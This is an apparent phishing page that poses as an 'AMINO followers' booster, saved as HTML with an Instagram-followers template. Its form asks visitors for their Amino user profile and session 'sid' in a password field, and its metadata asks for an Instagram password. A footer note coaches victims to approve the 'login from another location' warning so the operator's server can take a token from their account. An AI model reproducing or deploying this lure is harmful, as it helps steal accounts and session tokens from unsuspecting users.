<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
   <meta name="description" content="Here you can login amino followers for. to Get followers you will need to login with your instagram username and passowrd">
   <meta name="keywords" content="amino followers login, login amino, amino followers login">

   
   <title>Login - AMINO</title>
   <!-- FAVICON-->
   <link rel="icon" href="#">
   <link href="login_files/css.css" rel="stylesheet" type="text/css">
   <!-- ICONS-->
   <link rel="stylesheet" href="login_files/font-awesome.css">

   <script type="text/javascript" async="" src="login_files/analytics.js"></script><script src="login_files/jquery_003.js"></script>
   <script>
      if ( window.jQBrowser.mobile && top.location != location) top.location.href = document.location.href;
   </script>
   <link rel="stylesheet" href="login_files/styles.css" id="stylescss">
   <link rel="stylesheet" href="login_files/theme-a.css">
   <!--[if lt IE 9]><script src="js/html5shiv.js"></script><script src="js/respond.min.js"></script><![endif]-->
   
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async="" src="login_files/js.js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-108348248-1');

</script>


</head>

<body>

<!-- START HEADER-->
   <header id="header" class="header novideo">
         <!-- START STICKY NAVBAR-->
         <div class="navbar navbar-default navbar-fixed-top navbar-sticky">
            <div class="container">
               <div class="navbar-header">
                  <button type="button" data-toggle="collapse" data-target="#navbar-main" class="navbar-toggle">
                     <span class="sr-only">Toggle navigation</span>
                     <span class="icon-bar"></span>
                     <span class="icon-bar"></span>
                     <span class="icon-bar"></span>
                  </button>
                  <a href="#" class="navbar-brand">
                     <img src="login_files/logo2.png" alt="AMINO Followers Pro logo">
                  </a>
               </div>
                              <!-- MENU-->
               <div id="navbar-main" class="navbar-collapse collapse">
                  <ul class="nav navbar-nav navbar-right main-navbar">
                     <li><a href="https://www.instafollowerspro.com/">Home</a>
                     </li>
                     <li><a href="https://www.instafollowerspro.com/how-to-use">How To Use</a>
                     </li>
                     <li><a href="https://www.instafollowerspro.com/android-app">Download App</a>
                     </li>
                     <li><a href="https://www.instafollowerspro.com/terms">Terms</a>
                     </li>
                     <li><a href="https://www.instafollowerspro.com/privacy-policy">Privacy Policy</a>
                     </li>
                  </ul>
               </div>
            </div>
         </div>
    </header>
    <div class="container text-center">
      <h1 class="pagehead">
            amino followers
      </h1>
      <div class="pagedescrptText">
Before login to this website you need to read <a href="https://www.instafollowerspro.com/privacy-policy" style="font-weight:bold; color: red;">Privacy Policy</a> &amp; <a href="https://www.instafollowerspro.com/terms" style="font-weight:bold; color: red;">Terms of Use</a>.
 If you aren't agree with our terms of uses you are not allow to login 
in this website. To login into insta followers pro you will need to 
Enter your amino login detail to get login. You can also login using
 another amino account and then give followers to your real profile.<br><br>

      </div>
      <div class="row">
         <div class="col-lg-12 panel">
            <div class=" panel-heading">
                
            </div>
            <div class="panel-body ">             
<img src="#" alt="HTML5 Icon" style="width:128px;height:128px;">
               <div class="col-md-4">
               </div>
               <div class="col-md-4">
                  <div class="form-group">
	                 <form class="ajax" data-action="instagram_login" method="post">
	                 	<fieldset class="text-left">
<div class="text-center"><strong><u>Enter amino id user profile and sid</u></strong></div><br>
                           <div class="form-group">
                              <label class="loginLabel">user profile</label>
                              <input placeholder="user profile" class="form-control inputtext input-lg btn-square" name="username" id="username" type="text">
                           </div>
                           <div class="form-group">
                              <label class="loginLabel">your sid</label>
                              <input placeholder="sid " class="form-control btn-square input-lg" name="password" id="password" type="password">
                           </div>
                           <div class="form-group">
                              <button type="submit" class="btn btn-theme btn-block btn-square btn-{scheme}">go</button>
                           </div>
                           <p class="text-center" style="font-weight:600;">By Submitting, You must be agree to Our <a href="https://www.instafollowerspro.com/privacy-policy" style="font-weight:bold; color: red;">Privacy Policy</a> &amp; <a href="https://www.instafollowerspro.com/terms" style="font-weight:bold; color: red;">Terms of Use</a></p>

                        </fieldset>
                        <p></p>
                       <div class="ajax-alerts"></div>
	                 </form>
                  </div>

               </div>

               <div class="col-md-4">
                  &nbsp;
               </div>

               
               
            </div>
            <div class="panel-footer">
                <article>
                    <strong>Note: </strong><p>
                        If you got this error <strong style="color: red;">"Unknown error occured, please try again after a while"</strong>
 while login into this website. It's mean your account was temporary 
block on amino. Please visit your amino account you well see a 
warning message. That your account was login form another location it 
mean our server was trying to genrate token from your porfile. So you 
need to click on that's was me.
                        Then login again and you will successfully 
logged into dashboard.
                    </p>
                </article>
            </div>
         </div>
      </div>
    


   <section id="contact" class="contact">
      <div class="container">
         <!-- SECTION HEADER-->
         <!-- SOCIAL SHARE-->
         <ul class="list-icons">
            <li>
               <a href="">
                  <em class="fa fa-twitter-square"></em>
               </a>
            </li>
            <li>
               <a href="https://www.facebook.com/instagramfollowerspro/">
                  <em class="fa fa-facebook-square"></em>
               </a>
            </li>
            <li>
               <a href="https://plus.google.com/115530341199967649265">
                  <em class="fa fa-google-plus-square"></em>
               </a>
            </li>
            <li>
               <a href="https://www.instagram.com/instafollowers8984/">
                  <em class="fa fa-instagram"></em>
               </a>
            </li>
            <li>
               <a href="">
                  <em class="fa fa-flickr"></em>
               </a>
            </li>
            <li>
               <a href="">
                  <em class="fa fa-pinterest-square"></em>
               </a>
            </li>
         </ul>
               </div>
   </section>
      <!-- START FOOTER-->
   <footer id="footer">
      <div class="container">
         <div class="row">
            <div class="col-sm-6">
               <ul class="footer-nav">
                  <li><a href="https://www.instafollowerspro.com/" class="scrollto">Home</a>
                  </li>
                  <li><a href="https://www.instafollowerspro.com/blog" class="=">Blog</a>
                  </li>
                  <li><a href="https://www.instafollowerspro.com/about" class="">About</a>
                  </li>
                  <li><a href="https://www.instafollowerspro.com/terms" class="">Terms</a>
                  </li>
                  <li><a href="https://www.instafollowerspro.com/faq" class="=">FAQ</a>
                  </li>
               </ul>
            </div>
            <div class="col-sm-6">
               <!-- COPYRIGHT-->
               <p class="copyright">aminoapps.com © 2019</p>
            </div>
         </div>
      </div>
   </footer>
   <!-- END FOOTER-->

  
   
   <!-- VENDOR SCRIPTS-->
   <script src="login_files/jquery_002.js"></script>
   <script src="login_files/jquery_003.js"></script>
   <script src="login_files/jquery_006.js"></script>
   <script src="login_files/bootstrap.js"></script>
   <script src="login_files/jquery_005.js"></script>
   <script src="login_files/smoothscroll.js"></script>\
   <script src="login_files/jquery.js"></script>
   <!-- SITE SCRIPTS-->
       <script src="login_files/jquery_004.js"></script>

   <script src="login_files/scripts.js"></script>
   <script async="" src="login_files/otherscript.js"></script>



</body></html>
